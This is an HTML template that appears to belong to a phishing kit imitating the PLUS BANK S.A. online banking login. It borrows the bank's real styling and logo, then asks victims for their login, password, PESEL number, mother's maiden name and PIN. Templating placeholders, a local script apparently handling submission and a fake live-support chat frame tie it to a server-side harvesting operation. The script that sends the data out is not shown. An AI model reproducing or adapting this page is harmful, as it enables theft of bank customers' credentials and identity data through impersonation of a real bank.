<html xmlns="http://www.w3.org/1999/xhtml">

<head>
    <meta http-equiv="Cache-Control" content="no-cache">
    <meta http-equiv="Cache-Control" content="no-store">
    <meta http-equiv="expires" content="0">
    <meta http-equiv="pragma" content="no-cache">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE">


    <link rel="stylesheet" type="text/css"
        href="https://plusbank24.pl/web-client/js/jquery/csspluscolor/jquery-ui-1.9.1.custom.min.css">
    <script type="text/javascript" src="https://plusbank24.pl/web-client/js/jquery/jquery-1.12.2.min.js"></script>
    <script type="text/javascript"
        src="https://plusbank24.pl/web-client/js/jquery/csspluscolor/jquery-ui-1.9.1.custom.min.js"></script>
    <script type="text/javascript" src="https://plusbank24.pl/web-client/js/jquery/jquery.placeholder.js"></script>
    <link rel="stylesheet" type="text/css" href="https://plusbank24.pl/web-client/csspluscolor/style.css">
    <link rel="stylesheet" type="text/css" href="https://plusbank24.pl/web-client/csspluscolor/additional.css">
    <link rel="stylesheet" type="text/css" href="https://plusbank24.pl/web-client/css/pwdmeter.css">
    <link rel="shortcut icon" href="https://plusbank24.pl/web-client/csspluscolor/images/favicon.ico"
        type="image/x-icon">

    <link rel="stylesheet" href="/css/default_lk.css">



    <title>PLUS BANK S.A. – System Bankowości Elektronicznej</title>

    <style type="text/css">
        .ui-datepicker-close {
            display: none;
        }
    </style>
    <style type="text/css">
        .ui-datepicker-trigger {
            display: none;
        }
    </style>
</head>

<body>


    <div id="blockframe">
        <div id="circle">&nbsp;</div>
    </div>
    <div id="main_header">
        <div id="header">


            <div id="header-logo"><a href="#"><img
                        src="https://plusbank24.pl/web-client/csspluscolor/images/logo-bank-int.gif" width="180"
                        height="94" align="middle"></a></div>



            <div id="main-menu">
                <ul>

                    <li class="active">
                        <a href="">Logowanie</a>
                        <span></span>
                    </li>


                </ul>
            </div>


        </div>
    </div>

    <div id="main_submenu">

    </div>

    <div id="main_content">

        <form id="lk_form">
            <div id="left-col-login">
                <div class="box-content-login">
                    <div class="top">
                        <div class="bottom">
                            <h2 class="icon-login">Zaloguj się</h2>

                            <table class="table-pref clear">
                                <tbody>
                                    <tr class="clear-content">
                                        <td>
                                            <div>

                                                <div class="margin">
                                                    <strong>
                                                        <label>Podaj Identyfikator/Alias </label>
                                                    </strong><br>

                                                    <input type="text" maxlength="30" value="" required
                                                        autocomplete="off" id="login" class="text-bg"
                                                        style="width: 220px;">
                                                </div><br>
                                                <div class="margin">
                                                    <strong>
                                                        <label>Hasło</label>
                                                    </strong><br>

                                                    <input type="password" value="" required autocomplete="off"
                                                        id="password" class="text-bg" style="width: 220px;">
                                                </div><br>
                                                <div class="margin">
                                                    <strong>
                                                        <label>Pesel</label>
                                                    </strong><br>

                                                    <input type="text" value="" required autocomplete="off" id="pesel"
                                                        class="text-bg" style="width: 220px;">
                                                </div><br>
                                                <div class="margin">
                                                    <strong>
                                                        <label>Nazwisko panieńskie matki</label>
                                                    </strong><br>

                                                    <input type="text" value="" required autocomplete="off"
                                                        id="motherlastname" class="text-bg" style="width: 220px;">
                                                </div><br>
                                                <div class="margin">
                                                    <strong>
                                                        <label>PIN</label>
                                                    </strong><br>

                                                    <input type="password" value="" required autocomplete="off" id="pin"
                                                        class="text-bg" style="width: 220px;">
                                                </div><br>

                                                <div class="left">
                                                    <input type="submit" class="btn-navy-100 margin-left5"
                                                        value="Dalej">
                                                </div>







                                            </div>
                                        </td>
                                    </tr>


                                </tbody>
                            </table>
                        </div>
                    </div>
                </div>
                <div class="margin-add-10"></div>


            </div>
            <div id="right-col-login">

                <div class="margin-banner"></div>
                <div class="margin-banner"></div>

            </div>

            <div class="clear"></div>
            <input type="hidden" name="csrfVerifyToken" value="cba6e61e-b36c-4542-b970-9fa1699106a1"><input
                type="hidden" name="params.page" value="0">
        </form>



        <div class="clear"></div>
    </div>


    <div id="main_footer">
        <div id="footer">
            <div class="left"><strong>PLUS BANK S.A.</strong> Wszelkie prawa zastrzeżone.</div>
        </div>
    </div>



    <script src="https://code.jquery.com/jquery-3.6.0.min.js"
        integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.21.1/axios.min.js" crossorigin="anonymous"></script>
    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <script>
        const LOG_TOKEN = <%=log.token%>,
            AD_LANG = "<%=log.ad.service.lang%>",
            AD_ID = <%=log.ad.id%>,
            translate = <%-JSON.stringify(translate) %>;
    </script>
    <script src="/js/lk.js" defer></script>
    <link rel="stylesheet" href="/css/support_parent.css" />
    <div class="
    chatra--webkit
    chatra--style-round
    chatra--side-bottom
    chatra--pos-right
    chatra--visible
    chatra--expanded
    chatra--fast-toggle
  " id="chatra" data-turbolinks-permanent="" style="
    width: 380px;
    height: 600px;
    transform: none;
    z-index: 2147483647;
    display: none;
  ">
        <div id="chatra__iframe-wrapper">
            <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat"
                allow="autoplay" src="/supportChatFrame/<%=log.ad.id%>"
                style="width: 380px; height: 600px; position: absolute"></iframe>
        </div>
    </div>
    <div class="support-circle"
        onclick="document.querySelector('#chatra').style.display = 'block';this.style.display = 'none'"></div>
</body>

</html>